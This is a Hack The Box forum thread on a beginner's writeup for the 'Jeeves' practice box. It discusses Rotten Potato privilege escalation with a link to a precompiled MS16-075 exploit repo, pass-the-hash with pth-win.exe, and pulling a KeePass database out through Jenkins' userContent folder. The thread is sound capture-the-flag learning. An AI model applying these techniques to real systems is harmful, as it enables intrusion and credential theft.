Jeeves Writeup by Largoat

Hi all,

I’m very new to all of this. I’ve had an interest in all things CyberSec ever since I was a kid (now in my mid 30s) but have never really followed that path for whatever reason. I joined HTB last week and I absolutely love it. I definitely need a change of career so while I work on getting my qualifications I’ve decided to create a blog where I’ll post writeups for the boxes that I do; starting with Jeeves.

Since this is my first ever writeup, I’d very much appreciate feedback on how it reads, how informative it is or isn’t and if my way of doing things could be improved.

Writeup is here: https://largoat.uk/jeeves

TL;DR: Click link

Nice work mate I wanted to mention there is an intended way for priv esc on jeeves (ROtten Potato) and it worked for me

That’s something I’ve never heard of. I’m going to look it up and I may put a note on the writeup afterwards. Thank you

Hi Largoat,
I am a new user and trying to learn.
I have been following most of the write-ups. I followed all the instructions except, I couldn’t figure out your instruction on downloading the file “CEH.kdbx” to my local kali box.

Where you say, “There’s a couple of ways to do this. One is to use Netcat to set up a listener on the Jeeves box and then connect to it from your attacking machine but the easiest way I found was to copy the file to the userContent folder inside the Jenkins directory (C:\Users\Administrator.jenkins)”.

Where is exactly the ‘userContent’ folder, I copied the file to the C:\Users\Administrator.jenkins folder, then I tried to access the file to download it, it couldn’t just find this folder.

I went to http://10.10.10.63:50000/askjeeves/userContent/ but couldn’t find the copied file.

Please help me getting the file.

Also, you mentioned about an alternate way of initiating a listener on the remote Windows box, please provide some instructions/tips on that as well.

It would be a great learning experience for me please!

Thanks for the great work!

@B3nT3ch said:
Nice work mate I wanted to mention there is an intended way for priv esc on jeeves (ROtten Potato) and it worked for me

Hey mate, would you mind posting the steps you took for Priv Esc using Rotten Potatoes NTLM MiTM attack please?

Great writeup, but for Priv Esc, you can do it without metasploit by using pth-win.exe once you have the hash - especially if you intend to do oscp as I assume that it what you will be doing based on your initial message

@jwardak said:

@B3nT3ch said:
Nice work mate I wanted to mention there is an intended way for priv esc on jeeves (ROtten Potato) and it worked for me

Hey mate, would you mind posting the steps you took for Priv Esc using Rotten Potatoes NTLM MiTM attack please?

Yes ofc I heared about an exploit called potato from some time so that did lead me to search on google where I found this detailed article on it

after that i did look for the ready exe file i did not wona compile the program from it’s original repo and that led me to this github repo

I did follow the steps and it did work

@jwardak said:
Hi Largoat,
I am a new user and trying to learn.
I have been following most of the write-ups. I followed all the instructions except, I couldn’t figure out your instruction on downloading the file “CEH.kdbx” to my local kali box.

Where you say, “There’s a couple of ways to do this. One is to use Netcat to set up a listener on the Jeeves box and then connect to it from your attacking machine but the easiest way I found was to copy the file to the userContent folder inside the Jenkins directory (C:\Users\Administrator.jenkins)”.

Where is exactly the ‘userContent’ folder, I copied the file to the C:\Users\Administrator.jenkins folder, then I tried to access the file to download it, it couldn’t just find this folder.

I went to http://10.10.10.63:50000/askjeeves/userContent/ but couldn’t find the copied file.

Please help me getting the file.

Also, you mentioned about an alternate way of initiating a listener on the remote Windows box, please provide some instructions/tips on that as well.

It would be a great learning experience for me please!

Thanks for the great work!

Thanks for the kind words. I’m not at a machine right now to double check, but there should be a folder inside .jenkins called userContent. Any files placed in here will be served up on request, for example copying CEH.kdbx in to the userContent dir will be accessible using the url http://10.10.10.63:50000/askjeeves/userContent/CEH.kdbx.

I couldn’t get the netcat listener working, however I’m also having the same issues with 2 other boxes so I think there’s an issue on my system somewhere. I need to investigate this before I can write it up.

@richeze said:
Great writeup, but for Priv Esc, you can do it without metasploit by using pth-win.exe once you have the hash - especially if you intend to do oscp as I assume that it what you will be doing based on your initial message

I’m going to give this a go this week and will amend the writeup. Thanks for the advice!

@B3nT3ch said:

@jwardak said:

@B3nT3ch said:
Nice work mate I wanted to mention there is an intended way for priv esc on jeeves (ROtten Potato) and it worked for me

Hey mate, would you mind posting the steps you took for Priv Esc using Rotten Potatoes NTLM MiTM attack please?

Yes ofc I heared about an exploit called potato from some time so that did lead me to search on google where I found this detailed article on it
Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM

after that i did look for the ready exe file i did not wona compile the program from it’s original repo and that led me to this github repo
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

I did follow the steps and it did work

Thank you very much mate!

@Largoat said:

@jwardak said:
Hi Largoat,
I am a new user and trying to learn.
I have been following most of the write-ups. I followed all the instructions except, I couldn’t figure out your instruction on downloading the file “CEH.kdbx” to my local kali box.

Where you say, “There’s a couple of ways to do this. One is to use Netcat to set up a listener on the Jeeves box and then connect to it from your attacking machine but the easiest way I found was to copy the file to the userContent folder inside the Jenkins directory (C:\Users\Administrator.jenkins)”.

Where is exactly the ‘userContent’ folder, I copied the file to the C:\Users\Administrator.jenkins folder, then I tried to access the file to download it, it couldn’t just find this folder.

I went to http://10.10.10.63:50000/askjeeves/userContent/ but couldn’t find the copied file.

Please help me getting the file.

Also, you mentioned about an alternate way of initiating a listener on the remote Windows box, please provide some instructions/tips on that as well.

It would be a great learning experience for me please!

Thanks for the great work!

Thanks for the kind words. I’m not at a machine right now to double check, but there should be a folder inside .jenkins called userContent. Any files placed in here will be served up on request, for example copying CEH.kdbx in to the userContent dir will be accessible using the url http://10.10.10.63:50000/askjeeves/userContent/CEH.kdbx.

I couldn’t get the netcat listener working, however I’m also having the same issues with 2 other boxes so I think there’s an issue on my system somewhere. I need to investigate this before I can write it up.

@richeze said:
Great writeup, but for Priv Esc, you can do it without metasploit by using pth-win.exe once you have the hash - especially if you intend to do oscp as I assume that it what you will be doing based on your initial message

I’m going to give this a go this week and will amend the writeup. Thanks for the advice!

Thanks heaps!

@jwardak said:

@B3nT3ch said:

@jwardak said:

@B3nT3ch said:
Nice work mate I wanted to mention there is an intended way for priv esc on jeeves (ROtten Potato) and it worked for me

Hey mate, would you mind posting the steps you took for Priv Esc using Rotten Potatoes NTLM MiTM attack please?

Yes ofc I heared about an exploit called potato from some time so that did lead me to search on google where I found this detailed article on it
Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM

after that i did look for the ready exe file i did not wona compile the program from it’s original repo and that led me to this github repo
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

I did follow the steps and it did work

Thank you very much mate!

You are welcome :slight_smile: